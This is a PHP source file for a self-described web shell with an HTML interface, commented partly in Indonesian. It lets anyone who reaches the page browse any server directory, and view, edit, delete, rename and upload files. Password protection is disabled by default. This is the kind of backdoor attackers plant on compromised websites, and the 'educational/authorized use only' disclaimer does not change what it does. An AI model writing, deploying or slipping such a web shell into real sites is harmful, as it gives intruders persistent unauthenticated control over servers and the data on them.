<?php // Simple PHP Web Shell with UI // For educational/authorized use only // Opsional: set password untuk autentikasi (kosongkan jika tidak perlu) $auth_password = ''; // Ganti dengan password jika ingin if ($auth_password !== '' && (!isset($_POST['auth_pass']) || $_POST['auth_pass'] !== $auth_password)) { if (isset($_POST['auth_pass'])) { echo 'Wrong password.'; } ?> <form method="post"> <input type="password" name="auth_pass" placeholder="Password" /> <input type="submit" value="Login" /> </form> <?php exit; } // Direktori saat ini $base_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); $base_dir = realpath($base_dir); if (!$base_dir || !is_dir($base_dir)) { $base_dir = getcwd(); } chdir($base_dir); // Handle aksi $action = isset($_GET['action']) ? $_GET['action'] : ''; $file = isset($_GET['file']) ? $_GET['file'] : ''; $new_name = isset($_POST['new_name']) ? $_POST['new_name'] : ''; if ($action == 'delete' && $file) { $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)) { unlink($path); header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Cannot delete: invalid file."; } } elseif ($action == 'rename' && $file && $new_name) { $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)) { $new_path = dirname($path) . '/' . $new_name; rename($path, $new_path); header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Cannot rename: invalid file."; } } elseif ($action == 'edit' && $file && isset($_POST['content'])) { $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)) { file_put_contents($path, $_POST['content']); header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Cannot edit: invalid file."; } } elseif ($action == 'upload' && isset($_FILES['upload_file'])) { $target = $base_dir . '/' . 
basename($_FILES['upload_file']['name']); if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) { header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Upload failed."; } } // Tampilan UI ?> <!DOCTYPE html> <html> <head> <title>Web Shell</title> <style> body { font-family: monospace; margin: 20px; background: #f4f4f4; } .container { max-width: 1200px; margin: auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); } h1 { margin-top: 0; } .path { background: #eee; padding: 10px; border-radius: 4px; margin-bottom: 20px; word-break: break-all; } table { width: 100%; border-collapse: collapse; } th, td { text-align: left; padding: 8px; border-bottom: 1px solid #ddd; } th { background: #f2f2f2; } .actions a { margin-right: 5px; text-decoration: none; } .upload-form { margin: 20px 0; padding: 10px; background: #f9f9f9; border: 1px solid #ddd; border-radius: 4px; } .upload-form input[type=file] { margin-right: 10px; } .error { color: red; margin-bottom: 10px; } .success { color: green; margin-bottom: 10px; } .edit-form textarea { width: 100%; height: 400px; font-family: monospace; margin-bottom: 10px; } .edit-form input[type=submit] { padding: 8px 16px; } </style> </head> <body> <div class="container"> <h1>Web Shell</h1> <?php if (isset($error)): ?> <div class="error"><?php echo htmlspecialchars($error); ?></div> <?php endif; ?> <div class="path">Current directory: <?php echo htmlspecialchars($base_dir); ?></div> <?php if ($action == 'edit' && $file): $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)): $content = file_get_contents($path); ?> <div class="edit-form"> <h2>Editing: <?php echo htmlspecialchars($file); ?></h2> <form method="post"> <textarea name="content"><?php echo htmlspecialchars($content); ?></textarea><br> <input type="submit" value="Save"> <a href="?dir=<?php echo urlencode($base_dir); ?>">Cancel</a> </form> </div> <?php else: ?> <div 
class="error">File not found or invalid.</div> <a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a> <?php endif; ?> <?php elseif ($action == 'view' && $file): $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)): ?> <h2>Viewing: <?php echo htmlspecialchars($file); ?></h2> <pre><?php echo htmlspecialchars(file_get_contents($path)); ?></pre> <a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a> <?php else: ?> <div class="error">File not found or invalid.</div> <a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a> <?php endif; ?> <?php else: ?> <div class="upload-form"> <form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?php echo urlencode($base_dir); ?>"> <input type="file" name="upload_file"> <input type="submit" value="Upload"> </form> </div> <table> <thead> <tr><th>Name</th><th>Size</th><th>Actions</th></tr> </thead> <tbody> <?php $files = scandir($base_dir); foreach ($files as $item): if ($item == '.' || $item == '..') continue; $full_path = $base_dir . '/' . $item; $is_dir = is_dir($full_path); $size = $is_dir ? '-' : filesize($full_path); $link = $is_dir ? '?dir=' . urlencode($full_path) : '?action=view&file=' . urlencode($full_path) . '&dir=' . 
urlencode($base_dir); ?> <tr> <td><a href="<?php echo $link; ?>"><?php echo htmlspecialchars($item); ?></a></td> <td><?php echo $size; ?></td> <td class="actions"> <?php if (!$is_dir): ?> <a href="?action=edit&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>">Edit</a> <a href="?action=delete&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>" onclick="return confirm('Delete this file?')">Delete</a> <form style="display:inline;" method="post" action="?action=rename&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>"> <input type="text" name="new_name" placeholder="New name" style="width:100px;"> <input type="submit" value="Rename"> </form> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; ?> </div> </body> </html>